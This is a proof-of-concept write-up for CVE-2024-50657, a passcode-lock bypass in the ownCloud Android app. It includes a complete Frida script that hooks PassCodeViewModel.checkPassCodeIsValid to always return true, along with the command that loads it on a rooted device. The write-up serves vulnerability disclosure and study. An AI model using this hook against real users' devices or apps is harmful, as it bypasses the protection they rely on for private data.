PoC details: 56283ea45b5658cb654b69f0e1ca5ee32f444f30

Source
Related vulnerability
Title: ownCloud security vulnerability (CVE-2024-50657)
Description: ownCloud is a personal cloud storage solution from the company of the same name. ownCloud v.4.3.1 contains a security vulnerability that an attacker can use to escalate privileges.
Introduction
# CVE-2024-50657: Incorrect Access Control in the ownCloud Android APK

An issue in the ownCloud Android APK allows a physically proximate attacker to escalate privileges via the PassCodeViewModel class, specifically its checkPassCodeIsValid method: the passcode lock is enforced only by the boolean result of this client-side method, so overriding that result at runtime bypasses the lock.

# Exploitation

## Identify the target class and method

> The PassCodeViewModel class in the application holds the passcode verification logic.
> Its checkPassCodeIsValid method decides whether the passcode the user entered is valid.

## Hook the method using Frida

> A Frida script hooks checkPassCodeIsValid in the PassCodeViewModel class.
> The method's implementation is replaced so that it always returns true, bypassing the real passcode comparison.

## Execution

> The Frida script is loaded while the app is running.
> Any passcode the user enters is then accepted as valid, granting unauthorized access to the passcode-protected parts of the app.
> Attaching Frida to a third-party app requires frida-server on a rooted device, or the app repackaged with the Frida gadget, so the precondition is an attacker with hands-on access to such a device, matching the "physically proximate attacker" wording above.
# PoC

```javascript
// Frida script: force PassCodeViewModel.checkPassCodeIsValid to always return true.
// Load it into the running app, e.g. with frida-server on a rooted device:
//   frida -U -n <ownCloud process name> -l poc.js
// (process name or PID as shown on your device; adjust to your setup)
Java.perform(function () {
  // Locate the PassCodeViewModel class in the target application
  var PassCodeViewModel = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');

  // Hook checkPassCodeIsValid to replace its behaviour. If the method has more than
  // one overload, Frida refuses a direct assignment and the target must first be
  // selected with .overload(...) before setting .implementation
  PassCodeViewModel.checkPassCodeIsValid.implementation = function (passcode) {
    // Bypass the actual passcode check by always returning true
    return true;
  };
});
```

Video POC Link : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing
# Impact

This is a client-side security bypass. It affects users who rely on the app's passcode feature to protect sensitive data or to restrict access to parts of the app. By hooking the check, an attacker with the device in hand bypasses the passcode prompt and reaches areas of the app that should be locked, potentially exposing user data or allowing unauthorized actions within the app. Because the check runs entirely on the device and its boolean result is all the app trusts, nothing prevents an instrumentation framework from overriding that result.

File snapshot

[4.0K] /data/pocs/56283ea45b5658cb654b69f0e1ca5ee32f444f30 └── [1.9K] README.md 0 directories, 1 file